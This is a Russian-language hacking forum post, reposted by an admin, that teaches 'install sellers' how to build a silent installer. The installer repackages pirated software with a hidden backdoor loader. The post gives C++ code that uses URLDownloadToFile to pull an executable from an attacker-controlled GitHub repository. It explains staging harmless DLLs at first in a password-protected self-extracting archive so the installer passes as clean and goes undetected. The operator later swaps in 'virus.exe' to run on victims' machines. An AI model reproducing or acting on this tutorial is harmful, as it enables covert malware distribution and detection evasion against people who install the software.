Тихий инсталлятор софта с бекдором на С++

  • Автор темы Admin

Admin

#1
Администратор
Регистрация
31.12.2019
Сообщения
6,888
Реакции
25
По многочисленным просьбам юных трафикмейкеров и инсталлоселлеров сегодня поведаю как из говна и палок собрать убогий инсталлятор с убогим бекдором но который все же работает и не детектится.

Не на что не претендую это всего лишь рабочий концепт. Знаю что можно сделать сложнее.

1. Качаем и устанавливаем убогий Smart Install Maker

2. Копипиздим файлы какого либо убогого софта который мы будем юзать и выдавать за наш.

3. Создаем убогую учетку на гитхабе и создаем первый репозиторий.

4. Берем какие нибудь убогие и безобидные dll 1-2 штуки например vc140.dll и т.д. и создаем самораспаковывающийся запароленный rar архив. Как на скринах.

9b1d553e4f0139473c7c4.png

e226b32db18918b565d60.png


5. Заливаем этот самораспаковывающийся запароленный rar архив (т.е. exe файл) на гитхаб в корень нашего репозитория

6. Открываем VisualStudio и последовательно тыкаем File - New Project - Win32 Console Application

Задаем имя нашему проекту (допустим libsqlupdate)

В application wizard тыкаем Next и потом Finish.


Вставляем следуюший код

Код:
#include <string>
using namespace std;

int main()

{
	URLDownloadToFile(0, L"https://github.com/github-username/myreponame/raw/master/files.exe", L"resupdate.exe", 0, 0);
	return 0;

}

a88187eb65572b9684821.png


github-username - меняем на имя нашего убогого пользователя на гитхабе

myreponame - меняем на имя нашего убогого репозитория где будет хранится файлы.

files.exe - имя нашего убогого самораспаковывающегося запароленного rar архива в убогом репозитории на гитхабе.

resupdate.exe - меняем на files.exe или любое удобное для вас имя (потом нужно будет это имя прописывать в команды Smart Install Maker

Меняем тип сборки с Debug на Release

И собираем проект - нажимаем control + shift + b

В папке C:\Users\ВашУбогийЮзерВинды\Documents\Visual Studio 2013\Projects\libsqlupdate\Release

будет лежать файл libsqlupdate.exe

Кладем его в папку с остальными файлами для проекта Smart Install Maker

b77b4895167434e2d7b8f.png


7. Создаем подобный проект в Smart Install Maker и прописываем все как на скринах (естественно меняем названия на свое усмотрение). Все используемые на скринах программы вымышленные, любое совпадение с реальными программами считать слуайностью.

0ace4cf8b2dc1e75bce78.png

7a03a56050a1947a944e1.png

de2877da2a74d6a5de87f.png

718a2aba4531c461de039.png

e39e7d08dc927736ba750.png

87c94b16a15352f57f638.png


8. Далее прописываем такие команды в наш проект.

64f9ed31c9b100f02d259.png

3ab1feef58c8e01d615c1.png

08125feeea85d9fba615c.png


virus.exe - можно моменять на любое удобное имя.

Где 777777777777777777 это пароль которым мы зашифровали наш самораспаковывающийся архив.

Сразу заметил косяк. На скрине где прописывается запуск virus.exe стоит before unpacking а должно стоять after

Готово. Когда на гитхабе архив с безобидными dllками то и наш инстлятор соответственно безобиден. Но стоит только нам заменить архив на гитхабе и поместить внутрь него virus.exe то будет выполнятся наш бекдор.

Думаю написать подобную статью о создании инсталлятора но с использованием методов стеганографии. Например не будет качаться напрямую exe файл, а будет качатся пикча из которой будет собираться exe и т.д.

Автор: tellst1
 

Members, viewing this thread

Сейчас на форуме нет ни одного пользователя.